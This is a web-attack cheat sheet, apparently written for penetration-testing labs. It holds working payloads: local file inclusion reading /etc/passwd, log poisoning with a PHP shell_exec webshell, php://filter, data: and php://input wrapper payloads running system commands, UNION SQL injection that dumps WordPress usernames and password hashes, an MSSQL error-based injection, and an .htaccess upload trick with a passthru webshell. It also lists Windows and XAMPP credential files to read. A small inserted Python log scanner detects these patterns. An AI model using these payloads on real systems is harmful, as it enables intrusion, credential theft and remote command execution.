LFI

Simple

http://10.11.1.35/section.php?page=/etc/passwd

Poison Logs

nc -nv 10.11.0.22 80
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig

Wrappers

http://192.168.196.10/menu.php?file=data:text/plain,<?php echo shell_exec("ipconfig") ?>
http://192.168.1.132/?lang=php://filter/convert.base64-encode/resource=index
curl -s --data "<?system('$command');?>" "http://10.11.1.8/internal/advanced_comment_system/admin.php?ACS_path=php://input%00"
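
A defender's counterpart to the three LFI sections above, added here as an example and not part of the original cheat sheet: a small Python scanner that flags the traversal, PHP-wrapper, null-byte and log-poisoning indicators from those URLs in Apache access-log entries. The log lines, IPs and timestamps are constructed; the rule names are this example's own.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache "combined" log lines mirroring the requests shown above (not a real server).
SAMPLE_LOG = r'''
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /section.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /section.php?page=/etc/passwd HTTP/1.1" 200 1800 "-" "curl/7.88"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig HTTP/1.1" 200 9000 "-" "curl/7.88"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /?lang=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 4000 "-" "curl/7.88"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "POST /internal/advanced_comment_system/admin.php?ACS_path=php://input%00 HTTP/1.1" 200 300 "-" "curl/7.88"
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?> HTTP/1.1" 404 200 "-" "-"
'''

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3}')
REQ_RE = re.compile(r'^\S+ (?P<target>.*?)(?: HTTP/\d\.\d)?$')

# Rules applied to each URL-decoded query parameter value.
PARAM_RULES = {
    "sensitive_file": re.compile(r"(?i)(?:/etc/passwd|win\.ini|access\.log|\.\.[/\\])"),
    "php_wrapper": re.compile(r"(?i)^(?:php://|data:)"),
    "null_byte": re.compile(r"\x00"),  # %00 truncation; parse_qsl has already decoded it
}
# Log poisoning leaves PHP tags in the raw entry (request line or any header), so check the whole line.
POISON_RE = re.compile(r"<\?(?:php\b|system\b|=)")


def scan_line(line):
    """Return (ip, target, findings) for a parseable line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    req = REQ_RE.match(m.group("request"))
    target = req.group("target") if req else m.group("request")
    findings = []
    for name, value in parse_qsl(urlsplit(target).query):
        findings += [f"{rule}:{name}" for rule, pat in PARAM_RULES.items() if pat.search(value)]
    if POISON_RE.search(line):
        findings.append("php_tag_in_request")
    return m.group("ip"), target, findings


def scan_log(text):
    """Return only the entries that triggered at least one rule."""
    results = (scan_line(l) for l in text.strip().splitlines())
    return [r for r in results if r and r[2]]


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, ",".join(findings), target[:70])
```

Real deployments should also feed User-Agent and Referer fields to POISON_RE, since a raw request crafted with nc can place the payload in any logged header.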

Critical Files

Windows
c:\Windows\win.ini
c:\windows\System32\drivers\etc\hosts
%windir%\repair\sam
%windir%\System32\config\RegBack\SAM
%windir%\repair\system
%windir%\repair\software
%windir%\repair\security
%windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
%windir%\iis6.log (IIS 5, 6 or 7)
%windir%\system32\logfiles\httperr\httperr1.log
C:\sysprep.inf
C:\sysprep\sysprep.inf
C:\sysprep\sysprep.xml
%windir%\Panther\Unattended.xml
C:\inetpub\wwwroot\Web.config
%windir%\system32\config\AppEvent.Evt (Application log)
%windir%\system32\config\SecEvent.Evt (Security log)
%windir%\system32\config\default.sav
%windir%\system32\config\security.sav
%windir%\system32\config\software.sav
%windir%\system32\config\system.sav
%windir%\system32\inetsrv\config\applicationHost.config
%windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
%windir%\System32\drivers\etc\hosts (dns entries)
%windir%\System32\drivers\etc\networks (network settings)
%windir%\system32\config\SAM (only really useful if you have access to the files while the machine is off)
C:/Program Files/FileZilla Server/FileZilla Server.xml
Xampp
C:/xampp/apache/conf/httpd.conf
C:/xampp/security/webdav.htpasswd
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/xampp/tomcat/conf/web.xml
C:/xampp/tomcat/conf/tomcat-users.xml
C:/xampp/webalizer/webalizer.conf
C:/xampp/webalizer/webdav.txt
C:/xampp/apache/bin/php.ini
C:/xampp/passwords.txt
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml

SQLI

sandbox exercise

1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#
1650149780')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,table_name,11 FROM information_schema.tables#
1650149780')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,column_name,11 FROM information_schema.columns WHERE table_name='wp_users'#
1650149780')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_login,11 FROM wp_users#
1650149780')) OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,user_pass,11 FROM wp_users#

Microsoft SQL Server (MSSQL)

', convert(int,@@version) ) --

FileUpload

.htaccess trick
#.htaccess
<FilesMatch "evil.png">
SetHandler application/x-httpd-php
AddHandler php-script .png
</FilesMatch>

#evil.png
<?php passthru($_REQUEST['cmd']); ?>

Extensions
#PHP
.php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc

#ASP
.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml

#Jsp
.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action

#Coldfusion
.cfm, .cfml, .cfc, .dbm

#Flash
.swf

#Perl
.pl, .cgi